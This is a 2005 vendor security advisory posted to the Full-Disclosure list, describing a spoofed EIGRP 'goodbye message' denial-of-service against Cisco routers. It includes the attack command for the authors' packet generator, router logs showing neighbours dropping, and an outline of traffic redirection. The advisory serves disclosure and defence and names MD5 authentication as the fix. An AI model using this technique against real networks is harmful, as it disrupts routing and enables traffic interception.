Arhont Ltd.- Information Security

Arhont Advisory by:    Arhont Ltd
Advisory:               Unauthenticated EIGRP DoS
Class:            design bug
Version:        EIGRP version 1.2
Model Specific:         Other versions might have the same bug

DETAILS:

We have used our custom EIGRP packet generator written on Perl to 
evaluate the security of the EIGRP routing protocol.

In the initial generator testing stage we have successfully reproduced 
the known DoS against EIGRP discovered by FX and described
at http://www.securityfocus.com/bid/6443. This attack is canned in the 
generator using the --hellodos flag. The testing network was
completely brought down due to the ARP storm.

Moving further, we have discovered a novel selective single peer - 
directed DoS attack employing the EIGRP "Goodbye Message". A goodbye
message is sent when an EIGRP routing process is shutting down to tell 
the neighbors about the impending topology change to speed up the
convergence. This feature is supported in Cisco IOS Releases later than 
12.3(2), 12.3(3)B, and 12.3(2)T. A spoofed "goodbye message" can
be sent to a peer claiming that it's neighbor is down, thus breaking the 
neighborhood:

arhontus #/eigrp.pl --ipgoodbye 192.168.66.202 --as 65534 --source 
192.168.66.191
469573: Aug 16 2005 03:08:11.773 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 
65534: Neighbor 192.168.66.111 (Ethernet0/0) is up: new adjacency
c2611#sh ip eigrp neigh
IP-EIGRP neighbors for process 65534
H   Address                 Interface       Hold Uptime   SRTT   RTO  Q  Seq
                                            (sec)         
(ms)                                Cnt Num
2   192.168.66.111          Et0/0       13 00:01:08        1       5000  
1    0
0   192.168.30.191          Se0/0      12 00:05:06        1       4500  
0  198
1   192.168.66.191          Et0/0       13 00:05:14      201     1206  
0  199

469574: Aug 16 2005 03:09:31.299 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 
65534: Neighbor 192.168.66.111 (Ethernet0/0) is down: retry limit exceeded
c2611#
469575: Aug 16 2005 03:09:32.818 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 
65534: Neighbor 192.168.66.111 (Ethernet0/0) is up: new adjacency
c2611#
469576: Aug 16 2005 03:09:56.277 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 
65534: Neighbor 192.168.66.191 (Ethernet0/0) is down: Peer goodbye received
c2611#
469577: Aug 16 2005 03:09:59.283 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 
65534: Neighbor 192.168.66.191 (Ethernet0/0) is down: Peer goodbye received
469578: Aug 16 2005 03:09:59.868 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 
65534: Neighbor 192.168.66.191 (Ethernet0/0) is up: new adjacency
c2611#
469579: Aug 16 2005 03:10:02.288 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 
65534: Neighbor 192.168.66.191 (Ethernet0/0) is down: Peer goodbye received
c2611#
469580: Aug 16 2005 03:10:04.676 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 
65534: Neighbor 192.168.66.191 (Ethernet0/0) is up: new adjacency
469581: Aug 16 2005 03:10:05.289 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 
65534: Neighbor 192.168.66.191 (Ethernet0/0) is down: Peer goodbye received
c2611#
469582: Aug 16 2005 03:10:08.290 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 
65534: Neighbor 192.168.66.191 (Ethernet0/0) is down: Peer goodbye received

c2611#sh ip eigrp neigh
IP-EIGRP neighbors for process 65534
H   Address                 Interface       Hold Uptime   SRTT   RTO  Q  Seq
                                                             
(sec)           (ms)            Cnt Num
0   192.168.30.191          Se0/0       14 00:09:50       1       4500  
0   286

This selective nighborhood breaking can be used for other purposes, than 
DoS. Re-initiating the EIGRP handshake helps a sniffing attacker to find
information about the EIGRP routing domain topology. Possessing such 
information, a skilled attacker can selectively break the neighborhood 
to redirect
traffic the way he wants.

Of course, on an unportected EIGRP domain there is a much simpler way of 
traffic redirection, which is either directly injecting the routes using 
our
packet generator or establishing a fake neighbourhood and supplying 
metric parameters to the legitimate peers, which would lead DUAL to 
favor the fake
neighbor.

Risk Factor: Medium

Workarounds: Always use EIGRP MD5-based authentication.

Communication History: sent to PSIRT on 10/10/05

*According to the Arhont Ltd. policy, all of the found vulnerabilities 
and security issues will be reported to the manufacturer at least 7 days 
before
releasing them to the public domains (such as CERT and BUGTRAQ).

If you would like to get more information about this issue, please do 
not hesitate to contact Arhont team.*

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/